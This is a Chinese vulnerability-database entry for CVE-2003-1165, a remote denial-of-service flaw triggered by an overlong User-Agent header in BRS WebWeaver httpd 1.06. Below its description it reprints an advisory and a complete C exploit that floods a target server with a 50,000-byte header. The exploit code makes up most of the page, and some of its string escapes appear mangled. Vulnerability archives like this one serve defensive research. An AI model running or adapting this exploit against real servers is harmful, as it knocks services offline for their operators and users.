BRS WebWeaver httpd `User-Agent`远程缓冲区溢出漏洞

BRS WebWeaver httpd `User-Agent`远程缓冲区溢出漏洞

漏洞ID 1107568 漏洞类型 其他
发布时间 2003-11-01 更新时间 2005-10-20
图片[1]-BRS WebWeaver httpd `User-Agent`远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-1165
图片[2]-BRS WebWeaver httpd `User-Agent`远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200312-151
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23325
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-151
|漏洞详情
BRSWebWeaver是一款集成化的小型快速的HTTP和FTP服务程序,提供目录保护功能,适用于Windows9x/NT操作系统。BRSWebWeaverhttpd不正确处理用户提交的`User-Agent`字段数据,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。如果用户提交的HTTP请求中的`User-Agent`字段包含超长字符串,当BRSWebWeaverhttpd解析时,可导致程序崩溃,停止所有响应,产生拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/8947/info

It has been reported that BRS WebWeaver may be prone to a denial of service issue that may allow a remote attacker to cause the software to crash or hang. The issue presents itself when the server receives a request containing a large string value for the `User-Agent` parameter. 

Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.

BRS WebWeaver versions 1.06 and prior have been reported to be prone to this issue.

/*
 *  BRS WebWeaver v.1.06 remote DoS exploit
 *
 * -d4rkgr3y [[email protected]]
 *
 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

#define port 80

main(int argc, char **argv) {
        struct hostent *hs;
        struct sockaddr_in sock;
        int sockfd, i;
        const c = 50000;
        char request[50150] =
                "GET /m00-r0cz HTTP/1.0n"
                "Accept: */*n"
                "Accept-Language: jpn"
                "Accept-Encoding: gzip, deflaten"
                "Host: m00security.orgn"
                "User-Agent: ";
        printf("BRS WebWeaver v.1.06 remote DoS exploitnn");

        if (argc!=2){
                printf("usagen %s hostnamenn",argv[0]);
                exit(1);
        }

        //memset((request+98),0x41,c);
        memset((request+strlen(request)),0x41,c);
        /* l33t ;] */
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x43;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x63;
        request[strlen(request)] = 0x74;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x3a;
        request[strlen(request)] = 0x20;
        request[strlen(request)] = 0x4b;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x65;
request[strlen(request)] = 0x70;
        request[strlen(request)] = 0x2d;
        request[strlen(request)] = 0x41;
        request[strlen(request)] = 0x6c;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x76;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x0a;

        bzero(&sock, sizeof(sock));
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
                if ((hs=gethostbyname(argv[1]))==NULL) {
                        printf("damn");
                        exit(1);
                }
                printf("~ Host resolved.n");
                sock.sin_family = hs->h_addrtype;
                
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
        }
        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                perror("damn");  exit(0);
        }

        if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
                perror("damn"); exit(0);
        }
        printf("~ Socket connectedn");
        printf("~ Sending evil code... ");
        write(sockfd,request,strlen(request));
        printf("donenn");
        close(sockfd);
}
|参考资料

来源:XF
名称:brswebweaver-useragent-bo(13571)
链接:http://xforce.iss.net/xforce/xfdb/13571
来源:BID
名称:8947
链接:http://www.securityfocus.com/bid/8947
来源:BUGTRAQ
名称:20031101BRSWebWeaver1.06remoteDoSvulnerability
链接:http://www.securityfocus.com/archive/1/343111
来源:NSFOCUS
名称:5624
链接:http://www.nsfocus.net/vulndb/5624

相关推荐: SCO UnixWare ‘xauto’ Buffer Overflow Vulnerability

SCO UnixWare ‘xauto’ Buffer Overflow Vulnerability 漏洞ID 1104514 漏洞类型 Boundary Condition Error 发布时间 1999-12-03 更新时间 1999-12-03 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享